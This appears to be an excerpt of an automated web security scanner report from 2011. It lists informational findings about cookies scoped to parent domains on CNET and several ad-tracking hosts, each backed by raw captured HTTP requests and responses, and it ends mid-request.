Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 04 May 2011 01:12:31 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 03 Jun 2011 01:12:31 GMT; Path=/
Set-Cookie: di=%7B%7D..1304471551.1FE|1304471551.60; Domain=.addthis.com; Expires=Thu, 02-May-2013 17:01:35 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 04 May 2011 01:12:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:12:31 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2
...[SNIP]...

14.12. http://news.cnet.com/webware/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.cnet.com
Path:   /webware/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webware/ HTTP/1.1
Host: news.cnet.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; topTechNews=0; __csv=6522d442e56f04a6|0; wsFd=true; arrowFdCounter=-1; arrowLrps=1303941361935; arrowLat=1303946351887; arrowSpc=7; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:50 GMT
Via: HTTP/1.0 phx1-rb-cnetnews-app1.cnet.com:8923 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 04 May 2011 01:30:51 GMT
Cache-Control: max-age=240, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=240
Edge-Control: max-age=240
Age: 119
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowLrps=1303946351887:1303941361935; domain=.cnet.com; path=/; expires=Thu, 03-May-2012 01:28:50 GMT
Set-Cookie: arrowLat=1304472530240; domain=.cnet.com; path=/; expires=Thu, 03-May-2012 01:28:50 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 03-Jun-2011 01:28:50 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 04-May-2011 02:28:50 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 04-May-2011 01:29:50 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 04-May-2011 01:28:55 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 04-May-2011 01:29:50 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Length: 117262

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>Webware - Cool Web apps for everyone - CNET</title> <meta
...[SNIP]...

14.13. http://ping.crowdscience.com/ping.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping.js?url=http%3A%2F%2Fnews.cnet.com%2Fwebware%2F&id=c2e7cdddce&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F534.24%20(khtml%2C%20like%20gecko)%20chrome%2F11.0.696.60%20safari%2F534.24&x=1304490536710&c=0&t=0&v=6522d442e56f04a6&m=0&cp0=LcGErAoOYI4AAGp4RtMAAAIs&cp1=Cg8JIk24ijttAAAASDs HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csv=6522d442e56f04a6

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:29:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=6522d442e56f04a6; Domain=.crowdscience.com; expires=Tue, 02 Aug 2011 01:29:04; Path=/
Content-Length: 8000
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain


(function (){

var cs = CrowdScience;

cs.state = 1; // cs.states.ping_loading;

cs.invitation_beforeShow = function() {};
cs.invitation_afterShow = function() {};

cs.i
...[SNIP]...

14.14. http://pix04.revsci.net/K05540/b3/0/3/1003161/695265068.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K05540/b3/0/3/1003161/695265068.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K05540/b3/0/3/1003161/695265068.js?D=DM_LOC%3Dhttp%253A%252F%252Fnews.cnet.com%252Fwebware%252F%253Fsite%253D109%2526ncat%253D17939%25253A%2526ptype%253D8300%2526os%253D%252520%2526_rsiL%253D0%26DM_EOM%3D1&C=K05540 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4ddd50a2&0&&4db7974a&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4de2d7db&0&&4dbcd64a&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; rsiPus_cUAg="MLsXrtEupC5v4JDWbm5SF4iCa9rxq92nU/WOr6kAXZYdLpPAQvnyqW118N7oMEOiC2a+Qitt1jCSQnt7wOLuFf/9TQPsfq6IyG5KAtGyxR3fC69ZIS1PEfZ7+RJPbmgi5/Do4ttQz08XO1UZi7xW2INSPBRMu/rnPp04+54Ys4dei76PNAqSipahtYUfnrULkB+5OvuWzwKUC5dvku8yoxjK9eqMv+qsudi6yDI5p7sjklqfA/Df4499H+aU47uX/ZStvm7s0bSjla+AwzWAysWR5lO0C6CV3XcHBk4XAJoLy17PEAhkXQrA5UZbouz0UH099/lxSt54s7u/1vi/Ooc6ZsdHYnkAmIE7OjXRhH5swOnx+Qe7TQNTY5avAup317qWXxpxHGJHaYXIBQgZDvVvP1/FdYHpe4ELzEm01fLjZ3NRUu3RLcxJe/LWkVmHz79Zn9KKPtd8TZxCCYd1SF0BsJd/w4RxAXd8u6LUBqIMTYJLRCFBZYAqfyg3pMk+tHsbPBAY+t4e0y5XfrgZeOS5LS0raNTRDvmgWWyrK/P3YcYuQx+1XxK1YTDnTUoMKeILlN/WyNsBDbEYkH1exWL76rR83Bi3+v2FqFxztf6n5/2gdRHjcEt9bVnJ4z3dKF3kglsKfCM6oHY8rFN7qcjUzF9dx5DdQ3yk9RA="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkS/GtHFajpUjRHJppcTQ/E+fDv3TBS3u3eKtw/qV68iFxwFHQSUXJh/TEDlqK5ymryWN1lLpjgHRFDSYttD59YZFrXOXgP3z1GpnIeFgtFDR1F1h1DvPJ6jGxiMDbAnxQhvYqAwMe3iYLqU5GS2b8LfrTbx7uRJOZcXZTF1nqAhc9j1XANGppgAkqLrW5J/DkaoiGFOnArblFlMxnIUs81A34N/6VKULJ5NXcgY4g9jLOtCz0A2zRfBV0tB6nig79jyxsPK/BtufPnOuytnDMGwwiEdVEfx6xS+gdhVS/YoP8gws4gSC0AJdMoSjsujh74M9+Fuy742S9LEO0odVcgP8nwKkbsPsv3MIMTgRwUByQS0+3PTu18ZNX15PFr3nkMs5yPDt2381kVtM3tUsb7UTaDxWlFawllYsd+K30dHBKmeOvEyOfWttKqC8T1WwfifCTg5OqGJEWYbTZJKrVqzIxoqCSdeInRhO8LVs1qCHv/xxr5klEDkmKfHvF3yACOKWqmWc99TGbMUwf1jXvnMacDDEIRle75AsgC1t0n9TOjQlEvQUGZUlrBNuwrAyA8WHgji5OTrwi6ZAOSH/kv/L1brD7LtY7KfEaHdjvNdTzvoBUQMG4UTO6tV8OPsAUbmXYKs6T9V0kUdHDxS5IPWKMbw64OOcJPQgyRxyqJsiuBp3dvkWmsDV+KduhariE+vHGWgkxjV3chDQ3HlznmZrWkDHUMxVsE5mlY8EEUQt0ADLtrW3uR1r4wH3z3ZIdpJAGNmiIVyRr2c2b7jtBhTZxAAlNf7l7f35RlM2r3iTLGaF16IS79K9XrMEkuBHsy/k9wS+yaRUPCDErkqNr9YH2bA5/m2lDsmX2vxXhzSVPIsZH46KEZTqbjaFkaMVUv/ITp08VtIAQ1Yvu8ZknO30xfvR4vAy1AWEvvRf2fTQTa86Cxadw7P5qlBPGbbc96CWkKYIaCHYlvv56SO55p0Bo3OSWyjxverGSQYL67FQcst0Y+Jf/kIY+hq/65Cw5pVhi+rOWA5T/otP69RNqpLBD3wut5wpUIOU3A3cz+Fww/cmAfldRXnDpjDHyOUTv16cufUECTFP4HtE7b0vSWonFxeUXUs0PotTR+7l6VjT1pd6km8G3O6Jy+CinadIyS1ZkYM7x6spOGE5UiyQvx8Zs2WjO/p+duPiDfcEZGtR+HUDufru+EUMxg4w6AcWPnyFQbFw5FZSvULDb31fy7NREGAnb8nazQEJ7uSv7XT8wDJIORNgj0zbeAPjKWAlyPP3oRqS3CgRk7KsmlGuzBtB/H49kpYMT"; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de3fbf4&1&10592&4dbcb06d&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9SEJaSpn5l5JKLO/U2zMplZx83H/bTC237PZPP4jQ9v2WwWS5cZka6FAtm4beqRWw/7FAzLkWXPgIi9Fdj34GJWiNsniOfS7N83ZJCMm7XF401Ak8vWIo3drFxdzUB2XmgOG9ISdXu2T5qiaUXtX5k07+zndetYCXU8uC6WDdbPbEoqZPrF3A8T56voczKp5HJXWppbAhBOpR1Q3V+n/B2dTNvVt6bTFoSl77GnSK+qm0rWdXpvZj5nqF2cft+CWWWDuF/5dASzKewgNKgf7RGFOPCpManPIHMt+4GfyeyPj5zfWNagNFpEckaIJcjc/Ype13DXWWJ+NDW6eNgR8bMyM9Zyz072r8TEAb4Q6wuCg6JC9maofi7MA7OH6/NLciMiiWIPt8V3CxjGnvuXNCsiiDDRDBsuvovIfC96g8LjpthMERi2dozqvhqKIWEsI/+jjOokTawe+rOS60DvuFWr7xsmQPQ+SwE6r+YYXbd3vWeDASYs3zZtgvziWdAwte9TTiQBZeQXMTcL+DH9/78GPE9gQXBY8H1yIDrQ2D68pY3wJmxiV81hz8iDIvqb3GO8EGeZm4kkirwWY1y48ApPVV3IiooXmVPD/xqlUB3XTtm74uulyjk3u6tiKLhMW/7hI0e/jJ17wGo+jgDKCuhaLWdBFwJUWwRWx/BfDZPZrSBLyd5E2jsyn0CtLepyVG2cd1tG1FInaSzBIckUsUbtgraQxhFODw8c0zBy7NOpwEDbGlzNg706flbCLyeANNyYedL1yZOFdplAJIgatt1S4HP6ZgoTEYK06y5+Np0yeHwjqX8uABNrJoH64bFZ8dY9PUtvCG6BNUp/4TINt6lfLnHCBk6Lq5CsUWRP/xPHGguJgxph+ru1g39Q9ELp+QH5J+Y6GoagCsKnJ1mVojp2RB2SwpbIaUPj4Hs9GDc9gUII4rbh4UJH2lmuKuIsMiheOLb6nsyiPGG0fkLn69U3w9lYopzQ9ulijnNkB2BmMz47lmgqJGWZfpzEcQPnUHkt8ubqpZp+ZvSRL1RdIFxVDS0n6A5NHnEWA9Tfhcb4v2tm38busuHAMXI39qv+Ulc4Qmd00nAJFaOb+UJSeHqTI6MD0faH5M2yZGoe/nbCt/+tX3tqNs1zPSmFTZokZkGS09goch/NIwev3f+oHX4J0WMaqS9PKtP8lO8hGdDnAvJppuoB9kTbXAKSD8Fdvn5/0kdBF0xzfU0wKy+lLEkHo5MA04LnHERHrjGPOyYwO; rsi_segs_1000000=pUP15E+BiXIMpzbvRoNY5K4WCE6libZDfViB4H9IvrTgu3a8SAYliDuqRNz2X2BRF3fyy1xVRhGFTmO/fPXiS+0D0CQb33NaZk9PJrifH4iI8SZ3NaFAIUgEOtF7ShhBBzwIRzG8ZzX0QiXR711ecIBc97bH+CzAFUPlmr5AsvICNOFljjN4yoq+qmuVtPv2y8PxcG37h5Ye3ytyRbi38v2yyUTyxrrtj2MvmKxmsDS94nTOSjW6yhvUIXvD7XhJU7W6Y5MyZ35LTh5LAh0Q9PExcAjngY/XokZ5EhcVerk/VDBkR/tN2lrFHxJdpOhNQ29rOfHpnxk/Hu93KXG34ORuQS1IPEIIIGZyKWrSWnaI88MnVv9Sl3lfM0MOYJbK2NkahfwUvdnqg022b6Uio9SZPx03LjNAkItc8fBHYMQWkauU+vYvuTQmZjSMS9jhLMg6tV9RaqS/9zLrug9Z/P1mNscPbko=; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de3fc9c&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbcf032&271d956a153787d6fee9112e9c6a9326; rtc_b3Fk=MLsHtzE1ZwprJpGrFhi4hKsp9SpKJjTHfY84CPYdGNEAVThHYM/F8EvK1KuXOWi3hDGoGlklVqD0zN4511BmlDEpLq7lwE0E9BI6f7LWbCSnU7k4gwwQW/9Jd4ievI5czRK32xT6rpDAOJefHMxDM9HZKWLe7J1MM8U7ohi7hEw9kdOspj9vDcN5sTt9SOwMMQoVXDIoXZN5wN+j1HcVS6vx+boZYJm66CsbRePLEh9tfG5+e9b5dbXzIM0W+GrfKajMaZGA1TjWA3CudqXRV5leHu0wUEKddVKXFMpQd2OqNucN1rq3aZgW4gPrhQwRe1pwMfLa7w7GHOUTWMXeW6IGudbQxCFYp/NHFUgc4JwWY3rdy8h1O7dAzPdLO6udIMesIC0/GkSRORgM35f/czrp53pn0oJCgkslqIHrwbgml5qdhVsbpR2Jv3CFnD6JSZT0PIYfCVUIIKv59LTsB5fieVPipsQ9SWmM8XGZ7nbfGTeRpsTHqYiLGamBl6vblHTinIHoAz7wl0thtPZJuEZAiH31SzTb1wzplVTTfHLEtxv8x/m0+sd3aacJTqzvcaz5Ip5yLdtVkaT7lwrKEBx5DISrNNtotRCzT9FXkWZYhjsq+/R0fv70XY8cfHHQ3BNtqzcdsFExW2APG+uYGGiR8dyx8aDnGuoT8HWa+vM1+oCrIAO4+U1IoVydaZ81CmmhmFsqHaLWU3VdKBKAGmTBXWGGHezSJpelIAMXuT76ivBvO9u0Q5WjMt3yg/kpgzrKrZRpRWasK/cG994Vl3afW6aBVULL2PYmFUCFSSkmWz6dWaSLvc8Kjg+xD5MjFEC6vQvRH5vNBGA/pwSwa/fJDhHKAl1btpaFPjPyumzSvyjS3tX0EpazrGuMjeZ/at2Zv/FUxiMdFJByxjPJ0J0RH5UEOqysjl9N+mkURT8IrZDO/Ao6fXukmf9bjieM5KE2/j5RVFQNUVJ/25RZwhOZ9xPJFdijL4Aaiz1SFj+WphXs3GKQZNW1GuO1Lc5Q8AR7RtT+6/b7qGkWXS8uxPHSEaXKyJhXeVsslXULN4phmlBcL5nSXOGTU515y7eStbwJ/J7gX3vZb/+0DLzdhKgHOxSJK1q0hQrybjB3JBdHtUytsqjCexwhGUpxjlv1qHuZkGZagSv6GiLY/X3m4Qp+H7MW+rMqTMt7+0ARhxGtSC6M06ahWZT90JUK5tfjSsYkxmkzhJMPiq2lCjriOlo/yVHxt0wsl12QUj+CHt/ILRuCwfQqh8HEc+s0mdl7UFJEMtCwDantmOufFw1KGkfiGzutO4NcmH9pxHzQUu4oMXdEJd1wqYvpmg5BmRp3yH+c4w==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_b3Fk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP95E+BsQIMp6b81ub+F6ivI6EAcKRa4TENR/hr6K55H6e0BpEFdTdR6IcU5PgEBVBKu7/EKGLpG0U9bK4TAA1PL7WMlNEKEG8V8HUP+XrItXAAcZ3g4WmmEVZ1mdDg+7ntoFBkData0eijREHGJIcKrOf05EaYkG6ZUrvN2cfnJjMCav/RH/4vDnoJ7MHeDWl3j1vVhsgb5DOoKh0wwiFmNdBAZ8JPeSlBJCbLWJeHgXMBtHa5AWqwTeUzeeIA0m+DF6kMAChgvkYLXXOqjI7A0Zeg3MUa2G7dKzMpWfSePSwFjHMLsoa9UqS9sY/XEPkvg82tXjUwLMfx/t0BX0w9lAnKqVlV0LYVLYnWt4Wl48/IZ3mgx+u4hMyarpNwxRLTEyO+vjusuvFUALw56p8jpKbTNONsZao2lsmoE3yJb3/cQkbxxAynruecgBZ8XEuQmzTFfOgVKSO/JPvu+PNNWiDNJ9C8f/ZT/Ks=; Domain=.revsci.net; Expires=Thu, 03-May-2012 01:28:58 GMT; Path=/
Set-Cookie: NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595da&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Wed, 01-Jun-2011 01:28:58 GMT; Path=/
Set-Cookie: rtc_xqZ4=MLsPtzE1JhpnJ5HLbtednoi0nCpKJlQQWwKX1s/hvto2CE2GUWSJvSl52PQqi52JpBK4GnVp9CADUVhC8UihMt47Kyqg5IhBs75AaGyI4DYeLzjpC3rGpxqcvluEW5RAzB7ukfIPR4OGlzUZaYCGAvr17sdnY7AbTj6bR8m0lkMpWQitVrl6tCXz9Dh8I00+4Uhv+5KZehhO7J1Fdf8+QBBQieU5F8S8bbaNk5nC4l37+T5FikDtiyevFoAx5NrjUqt3UbgM/vc0QAjVaq7FwKjOT09N86ggJ1piz3sJu2MfTd4RaLdhzRHVkggW/iopdcYYYAt/RfWuturE1q1oTvinK65+N/x2hab9/eP0oWcsum2hzuxAeqHtHg3b+tGIws0eS5gTLLy/M0X9T4Ga2YGkr7Imsq72334mpsJU3ITPD15sED3jjgsoo5PQVhoxccYWTZtOhtZD//kWYdVag2XS/aNF2czvTVdY41ak6VvAIID5L72S5YZx8I9eb1iG2qUtCebgX126P8fKKx3NDq3+3y4OBSqA4P/vlFZNkmOLKZlG7NBuMfxhK3/utr4v4+oot+42eGJ6U3VIFmS8vGMVtyqElhDe1yXccYYba1Jf+JZuqU/G8kyYkZOW3gYusdENbwrr1I4iY0fqmb57UjMxhLxWKtL9dI4ieIVOkYPk5TTpNwtvewgk25Rbg8EBpUkI4o4ewEOuV9VDDOZTmipJnobSmVfIAW+Y1nrV3CphE/vWKTOY2ZSh/4exB+QcPhfdeYDIbXAzqBjvAG+G1ovPHCoemWENb8p82N1Z/B4syGvLxUyDS35Q8NuZkCpMX7PvWN7XeA3SA/gKz/PNzojFZMg8t42QL1p47Onf24+Cy8y8vBfYSyiEt315Peuuv9MWFJ2TNUTa64jL1TzO4K5ilgRExd+0+LlbGZlWA4nMGcHybm4hueGOeQPqwAtQ5/kaVhSwI64CwilQnKAWkuN8F3BvimyTfR+gsJitMuBBeYXut8bYUn6pvsdSjm5Iz1FG6u4dVw/5UIF7a64Ro2ojiGOLZRgkjmaZRNRsXGGpbYUuvyJWJ1CvSaQIkqMXoboWAujPOYGbU5YpdL/ojwzUfBJ93G7WdKliVinQOzR/BaMAWOKY8duhzRzGBeKtEhSpH6ZyBf1lDGxsVh2hMyjZMD1gu8QRCSU1ukmkmHwVwCuUYbBjs5y5jJUMBbAPRiSE6+TU2D2lHN/QhrBJOFYxqRtUuNsvQu3E0BTI3wXaWGeLD+Ed8LYRr30k3k67AKIXa+Rwh6gmXjGuGWHAiYhfiJN5iLMfS9ccBAVHQwXAPlizOwEWGEq2ilZlFFJYcfiz8Tte1jn8xS45JcbJq/UGTlqG7486giU7j7viLctVk6bOgD9NWLuh; Domain=.revsci.net; Expires=Thu, 03-May-2012 01:28:58 GMT; Path=/
X-Proc-ms: 15
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 04 May 2011 01:28:57 GMT
Content-Length: 1657

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['K05540_10572','K05540_10573','K05540_10578','K05540_10276','K05540_10066','K05540_10087','K05540_10174','K05540_10185','K05540_10195','
...[SNIP]...

14.15. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dab4fa85facd099 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1304384620972%3As2.33%3D%2C2740%2C

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1304471552435%3As2.33%3D%2C3390%2C2740%2C; Domain=.33across.com; Expires=Thu, 03-May-2012 01:12:32 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Wed, 04 May 2011 01:12:32 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;

14.16. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1839560342;fpan=1;fpa=P0-115106725-1304488446007;ns=0;url=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1304488446006;tzo=300;a.1=p-94D6e1NDscLvI;labels.1=comment-links;a.2=p-18-mFEk4J448M;labels.2=type.intensedebate.embed HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EHcAGO8kjVmtjIMIufKMgQGpAQHTBoGTAJrRo6lXiz0bxeIAiz0aliAaNMEf4RBAHBIAAAMEAbtkuyDCA1x0MQIRsSASIBoSiyJQlhALEtM0IwggMEGOUQDokgDhAL4gihkYsrGvLiA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EDEAGO8kjVmtjIMIufKMgQGpAQHVBoHTAJrRo6lXiz0bxeIAiz0aliAaNMEf4RBAHBIAAAMEAbtkuyDCA1x0MQIRsSASIBoSiyJQlhALEtM0IwggMEGOUQDokgDhAL4gihkYsrGvLiA; expires=Tue, 02-Aug-2011 00:54:07 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Wed, 04 May 2011 00:54:07 GMT
Server: QS


14.17. http://tags.bluekai.com/site/3327  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3327

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3327?ret=js&phint=site%3D109&phint=ncat%3D17939%3A&phint=ptype%3D8300&phint=cid%3D2&phint=mfg%3D%20&phint=attr%3D%20&phint=carrier%3D%20&phint=os%3D%20&phint=__bk_t%3DWebware%20-%20Cool%20Web%20apps%20for%20everyone%20-%20CNET&phint=__bk_k%3Dweb%202.0%2C%20silicon%20valley%2C%20internet%2C%20business%2C%20applications%2C%20how-to&jscb=cbsiPrepBK&data=all&r=76483513 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJynWtHQLmc48XF/R9BAZRJjlgyxaCBe/oEapeYJeSvmQ6sVMTaCXXG5FQG1AAeVZHDf4wAj3GYLA6+t9wDSLp1yf9mpfQeNoiysLPuOgsyKW9L9NjzRV9==; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnjjLg9T1jj0UYOcuHZjyAi1dZkhHAR+vt9iCkvsWTyQ1xRyYx7flxEHQj2JOAZaJ7q5QQjjCxj5lLxryx3OicjKsFZ1Mv6mp9yoWkD13u9hPTT/a09vF1uuzq9YK/4AetzespmYwdW91meQqKuTxDp0slgluObZYGjswRi0E9pnWSuIKSOqBG8eTHo9aiV1f6=; bklc=4dbea79a; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjjLzXU9Wj/OQG=; 